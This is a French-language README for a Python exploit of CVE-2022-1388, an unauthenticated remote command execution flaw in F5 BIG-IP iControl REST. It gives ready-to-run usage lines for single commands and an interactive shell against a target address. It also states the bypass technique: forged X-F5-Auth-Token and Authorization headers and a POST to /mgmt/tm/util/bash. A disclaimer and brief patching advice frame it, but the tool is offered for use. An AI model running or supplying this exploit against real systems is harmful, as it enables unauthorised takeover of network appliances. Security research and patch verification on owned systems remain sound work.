
Exploit Python pour CVE-2022-1388, une vulnérabilité d'exécution de commandes à distance non authentifiée dans F5 BIG-IP iControl REST. Prend en charge les commandes uniques et les sessions shell interactives.
Ce script Python exploite CVE-2022-1388, une vulnérabilité critique dans F5 BIG-IP iControl REST qui permet l'exécution de commandes à distance sans authentification via un contrôle d'accès inapproprié et une gestion des en-têtes HTTP.
⚠️ Uniquement à des fins éducatives et de recherche en sécurité autorisée. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.
--shell)python3 cve_2022_1388_exploit.py -u <target_url> -c "<command>"
python3 cve_2022_1388_exploit.py -u https://192.168.1.1 -c "id"

python3 cve_2022_1388_exploit.py -u https://192.168.1.1 -a "root:password" -c "whoami"

python3 cve_2022_1388_exploit.py -u https://192.168.1.1 --shell

Le script contourne l'authentification en définissant des en-têtes X-F5-Auth-Token et Authorization forgés.
Envoie une requête POST à : /mgmt/tm/util/bash
Le payload déclenche l'exécution de la commande shell spécifiée.
Mettez à niveau vers les versions corrigées de F5 BIG-IP conformément aux recommandations de l'avis de sécurité F5.
Restreignez l'accès à l'interface iControl REST.
Ce script d'exploitation est fourni à des fins éducatives uniquement. Son utilisation se fait entièrement à vos propres risques.